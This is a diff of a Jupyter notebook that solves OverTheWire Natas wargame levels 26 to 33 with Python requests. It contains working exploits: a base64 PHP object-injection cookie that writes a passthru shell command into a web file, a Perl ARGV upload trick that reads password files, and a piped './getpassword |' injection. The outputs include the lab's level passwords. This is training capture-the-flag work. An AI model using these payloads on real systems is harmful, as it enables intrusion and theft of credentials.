--- a/Natas/natas.ipynb
+++ b/Natas/natas.ipynb
@@ -35,7 +35,7 @@
   },
   {
    "cell_type": "code",
-   "execution_count": 11,
+   "execution_count": 5,
    "metadata": {},
    "outputs": [],
    "source": [
@@ -76,7 +76,7 @@
     "def find_pwd(res):\n",
     "    global count\n",
     "    # Negative look ahead assertion\n",
-    "    pattern = r\"(?!n?a?t?a?s?\\d{1,2}?)[\\w\\d]{32}\"\n",
+    "    pattern = r\"[\\w\\d]{32}(?=<|\\s)\"\n",
     "    mat = re.findall(pattern, res.text)\n",
     "    natas = f\"natas{count}\"\n",
     "    if mat:\n",
@@ -1561,45 +1561,14 @@
   },
   {
    "cell_type": "code",
-   "execution_count": 24,
+   "execution_count": 3,
    "metadata": {},
    "outputs": [
     {
      "name": "stdout",
      "output_type": "stream",
      "text": [
-      "<html>\n",
-      "<head>\n",
-      "<!-- This stuff in the header has nothing to do with the level -->\n",
-      "<link rel=\"stylesheet\" type=\"text/css\" href=\"http://natas.labs.overthewire.org/css/level.css\">\n",
-      "<link rel=\"stylesheet\" href=\"http://natas.labs.overthewire.org/css/jquery-ui.css\" />\n",
-      "<link rel=\"stylesheet\" href=\"http://natas.labs.overthewire.org/css/wechall.css\" />\n",
-      "<script src=\"http://natas.labs.overthewire.org/js/jquery-1.9.1.js\"></script>\n",
-      "<script src=\"http://natas.labs.overthewire.org/js/jquery-ui.js\"></script>\n",
-      "<script src=\"http://natas.labs.overthewire.org/js/wechall-data.js\"></script><script src=\"http://natas.labs.overthewire.org/js/wechall.js\"></script>\n",
-      "<script>var wechallinfo = { \"level\": \"natas26\", \"pass\": \"cVXXwxMS3Y26n5UZU89QgpGmWCelaQlE\" };</script></head>\n",
-      "<body>\n",
-      "\n",
-      "<h1>natas26</h1>\n",
-      "<div id=\"content\">\n",
-      "\n",
-      "Draw a line:<br>\n",
-      "<form name=\"input\" method=\"get\">\n",
-      "X1<input type=\"text\" name=\"x1\" size=2>\n",
-      "Y1<input type=\"text\" name=\"y1\" size=2>\n",
-      "X2<input type=\"text\" name=\"x2\" size=2>\n",
-      "Y2<input type=\"text\" name=\"y2\" size=2>\n",
-      "<input type=\"submit\" value=\"DRAW!\">\n",
-      "</form>\n",
-      "\n",
-      "<img src=\"img/natas26_a0e61oj9sp713jau8h8uk40bt1.png\"><br />\n",
-      "<b>Fatal error</b>:  Uncaught Error: Cannot use object of type Logger as array in /var/www/natas/natas26/index.php:105\n",
-      "Stack trace:\n",
-      "#0 /var/www/natas/natas26/index.php(131): storeData()\n",
-      "#1 {main}\n",
-      "  thrown in <b>/var/www/natas/natas26/index.php</b> on line <b>105</b><br />\n",
-      "\n",
-      "password found: fu3RRffXjysjgwFU6b9xa23i6prmUsYne\n"
+      "password found: u3RRffXjysjgwFU6b9xa23i6prmUsYne\n"
      ]
     },
     {
@@ -1608,7 +1577,7 @@
        "True"
       ]
      },
-     "execution_count": 24,
+     "execution_count": 3,
      "metadata": {},
      "output_type": "execute_result"
     }
@@ -1621,7 +1590,7 @@
     "PHP_base64_encoded_payload = \"Tzo2OiJMb2dnZXIiOjM6e3M6MTU6IgBMb2dnZXIAbG9nRmlsZSI7czoxNjoiaW1nL2V4cGxvaXQxLnBocCI7czoxNToiAExvZ2dlcgBpbml0TXNnIjtzOjIyOiIjLS1zZXNzaW9uIHN0YXJ0ZWQtLSMKIjtzOjE1OiIATG9nZ2VyAGV4aXRNc2ciO3M6NTc6Ijw/cGhwIGVjaG8gcGFzc3RocnUoJ2NhdCAvZXRjL25hdGFzX3dlYnBhc3MvbmF0YXMyNycpOyA/PiI7fQ==\"\n",
     "cookies = dict(drawing=PHP_base64_encoded_payload)\n",
     "res = requests.get(url, auth=auth, cookies=cookies)\n",
-    "print(res.text)\n",
+    "# print(res.text)\n",
     "\n",
     "url = f\"http://natas{count}.natas.labs.overthewire.org/img/exploit1.php\"\n",
     "res = requests.get(url, auth=auth)\n",
@@ -1637,14 +1606,14 @@
   },
   {
    "cell_type": "code",
-   "execution_count": 26,
+   "execution_count": 4,
    "metadata": {},
    "outputs": [
     {
      "name": "stdout",
      "output_type": "stream",
      "text": [
-      "password found: f1JNwQM1Oi6J6j1k49Xyw7ZN6pXMQInVj\n"
+      "password found: 1JNwQM1Oi6J6j1k49Xyw7ZN6pXMQInVj\n"
      ]
     },
     {
@@ -1653,7 +1622,7 @@
        "True"
       ]
      },
-     "execution_count": 26,
+     "execution_count": 4,
      "metadata": {},
      "output_type": "execute_result"
     }
@@ -1690,7 +1659,7 @@
   },
   {
    "cell_type": "code",
-   "execution_count": 82,
+   "execution_count": 6,
    "metadata": {},
    "outputs": [
     {
@@ -1711,7 +1680,7 @@
        "True"
       ]
      },
-     "execution_count": 82,
+     "execution_count": 6,
      "metadata": {},
      "output_type": "execute_result"
     }
@@ -1749,7 +1718,7 @@
   },
   {
    "cell_type": "code",
-   "execution_count": 28,
+   "execution_count": 7,
    "metadata": {},
    "outputs": [
     {
@@ -1765,7 +1734,7 @@
        "True"
       ]
      },
-     "execution_count": 28,
+     "execution_count": 7,
      "metadata": {},
      "output_type": "execute_result"
     }
@@ -1791,50 +1760,23 @@
   },
   {
    "cell_type": "code",
-   "execution_count": 13,
+   "execution_count": 9,
    "metadata": {},
    "outputs": [
     {
      "name": "stdout",
      "output_type": "stream",
      "text": [
-      "password not found.\n",
-      "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\">\n",
-      "<head>\n",
-      "<!-- This stuff in the header has nothing to do with the level -->\n",
-      "<link rel=\"stylesheet\" type=\"text/css\" href=\"http://natas.labs.overthewire.org/css/level.css\">\n",
-      "<link rel=\"stylesheet\" href=\"http://natas.labs.overthewire.org/css/jquery-ui.css\" />\n",
-      "<link rel=\"stylesheet\" href=\"http://natas.labs.overthewire.org/css/wechall.css\" />\n",
-      "<script src=\"http://natas.labs.overthewire.org/js/jquery-1.9.1.js\"></script>\n",
-      "<script src=\"http://natas.labs.overthewire.org/js/jquery-ui.js\"></script>\n",
-      "<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src=\"http://natas.labs.overthewire.org/js/wechall.js\"></script>\n",
-      "<script>var wechallinfo = { \"level\": \"natas30\", \"pass\": \"WQhx1BvcmP9irs2MP9tRnLsNaDI76YrH\" };</script></head>\n",
-      "<body oncontextmenu=\"javascript:alert('right clicking has been blocked!');return false;\">\n",
-      "\n",
-      "<!-- morla/10111 <3  happy birthday OverTheWire! <3  -->\n",
-      "\n",
-      "<h1>natas30</h1>\n",
-      "<div id=\"content\">\n",
-      "\n",
-      "<form action=\"index.pl\" method=\"POST\">\n",
-      "Username: <input name=\"username\"><br>\n",
-      "Password: <input name=\"password\" type=\"password\"><br>\n",
-      "<input type=\"submit\" value=\"login\" />\n",
-      "</form>\n",
-      "win!<br>here is your result:<br>natas31m7bfjAHpJmSYgQWWeqRE2qVBuMiRNq0y<div id=\"viewsource\"><a href=\"index-source.html\">View sourcecode</a></div>\n",
-      "</div>\n",
-      "</body>\n",
-      "</html>\n",
-      "\n"
+      "password found: m7bfjAHpJmSYgQWWeqRE2qVBuMiRNq0y\n"
      ]
     },
     {
      "data": {
       "text/plain": [
-       "False"
+       "True"
       ]
      },
-     "execution_count": 13,
+     "execution_count": 9,
      "metadata": {},
      "output_type": "execute_result"
     }
@@ -1853,6 +1795,185 @@
     "\n",
     "# print(res.text)\n",
     "find_pwd(res)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## natas31\n"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 10,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "password found: NaIWhW2VIrKqrc7aroJVHOZvk3RQMi0B\n"
+     ]
+    },
+    {
+     "data": {
+      "text/plain": [
+       "True"
+      ]
+     },
+     "execution_count": 10,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "# import logging\n",
+    "# import http.client as http_client\n",
+    "\n",
+    "# http_client.HTTPConnection.debuglevel = 1\n",
+    "# logging.basicConfig(level=logging.DEBUG)\n",
+    "# logger = logging.getLogger()\n",
+    "# logger.setLevel(logging.DEBUG)\n",
+    "\n",
+    "# requests_log = logging.getLogger(\"urllib3\")\n",
+    "# requests_log.setLevel(logging.DEBUG)\n",
+    "# requests_log.propagate = True\n",
+    "\n",
+    "# https://www.blackhat.com/docs/asia-16/materials/asia-16-Rubin-The-Perl-Jam-2-The-Camel-Strikes-Back.pdf\n",
+    "\n",
+    "# natas31\n",
+    "count = 31\n",
+    "init()\n",
+    "\n",
+    "files = {\"file\": \"abc\"}\n",
+    "data = {\"file\": \"ARGV\"}\n",
+    "params = \"/etc/natas_webpass/natas32\"\n",
+    "\n",
+    "res = requests.post(url, auth=auth, files=files, data=data, params=params)\n",
+    "\n",
+    "# print(res.text[1400:])\n",
+    "find_pwd(res)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## natas32\n"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 12,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "password found: 2v9nDlbSF7jvawaCncr5Z9kSzkmBeoCJ\n"
+     ]
+    },
+    {
+     "data": {
+      "text/plain": [
+       "True"
+      ]
+     },
+     "execution_count": 12,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "# natas32\n",
+    "count = 32\n",
+    "init()\n",
+    "\n",
+    "files = {\"file\": \"abc\"}\n",
+    "data = {\"file\": \"ARGV\"}\n",
+    "params = \"./getpassword |\"\n",
+    "\n",
+    "res = requests.post(url, auth=auth, files=files, data=data, params=params)\n",
+    "\n",
+    "# print(res.text[1400:])\n",
+    "find_pwd(res)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## natas33\n"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 15,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "<html>\n",
+      "    <head>\n",
+      "        <!-- This stuff in the header has nothing to do with the level -->\n",
+      "        <link rel=\"stylesheet\" type=\"text/css\" href=\"http://natas.labs.overthewire.org/css/level.css\">\n",
+      "        <link rel=\"stylesheet\" href=\"http://natas.labs.overthewire.org/css/jquery-ui.css\" />\n",
+      "        <link rel=\"stylesheet\" href=\"http://natas.labs.overthewire.org/css/wechall.css\" />\n",
+      "        <script src=\"http://natas.labs.overthewire.org/js/jquery-1.9.1.js\"></script>\n",
+      "        <script src=\"http://natas.labs.overthewire.org/js/jquery-ui.js\"></script>\n",
+      "        <script src=\"http://natas.labs.overthewire.org/js/wechall-data.js\"></script><script src=\"http://natas.labs.overthewire.org/js/wechall.js\"></script>\n",
+      "        <script>var wechallinfo = { \"level\": \"natas33\", \"pass\": \"2v9nDlbSF7jvawaCncr5Z9kSzkmBeoCJ\" };</script></head>\n",
+      "    </head>\n",
+      "    <body>\n",
+      "        \n",
+      "        <h1>natas33</h1>\n",
+      "        <div id=\"content\">\n",
+      "            <h2>Can you get it right?</h2>\n",
+      "\n",
+      "                        <form enctype=\"multipart/form-data\" action=\"index.php\" method=\"POST\">\n",
+      "                <input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"4096\" />\n",
+      "                <input type=\"hidden\" name=\"filename\" value=\"sv5o1fq9sseu9s60f3gflmvsvh\" />\n",
+      "                Upload Firmware Update:<br/>\n",
+      "                <input name=\"uploadedfile\" type=\"file\" /><br />\n",
+      "                <input type=\"submit\" value=\"Upload File\" />\n",
+      "            </form>\n",
+      "\n",
+      "            <div id=\"viewsource\"><a href=\"index-source.html\">View sourcecode</a></div>\n",
+      "        </div>\n",
+      "    </body>\n",
+      "</html>\n",
+      "\n",
+      "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n",
+      "<html><head>\n",
+      "<title>404 Not Found</title>\n",
+      "</head><body>\n",
+      "<h1>Not Found</h1>\n",
+      "<p>The requested URL was not found on this server.</p>\n",
+      "<hr>\n",
+      "<address>Apache/2.4.58 (Ubuntu) Server at natas33.natas.labs.overthewire.org Port 80</address>\n",
+      "</body></html>\n",
+      "\n"
+     ]
+    }
+   ],
+   "source": [
+    "# natas33\n",
+    "count = 33\n",
+    "init()\n",
+    "\n",
+    "PHP_base64_encoded_payload = \"Tzo2OiJMb2dnZXIiOjM6e3M6MTU6IgBMb2dnZXIAbG9nRmlsZSI7czoxNjoiaW1nL2V4cGxvaXQxLnBocCI7czoxNToiAExvZ2dlcgBpbml0TXNnIjtzOjIyOiIjLS1zZXNzaW9uIHN0YXJ0ZWQtLSMKIjtzOjE1OiIATG9nZ2VyAGV4aXRNc2ciO3M6NTc6Ijw/cGhwIGVjaG8gcGFzc3RocnUoJ2NhdCAvZXRjL25hdGFzX3dlYnBhc3MvbmF0YXMyNycpOyA/PiI7fQ==\"\n",
+    "cookies = dict(drawing=PHP_base64_encoded_payload)\n",
+    "res = requests.get(url, auth=auth, cookies=cookies)\n",
+    "print(res.text)\n",
+    "\n",
+    "url = f\"http://natas{count}.natas.labs.overthewire.org/img/exploit1.php\"\n",
+    "res = requests.get(url, auth=auth)\n",
+    "print(res.text)\n",
+    "# find_pwd(res)"
    ]
   }
  ],
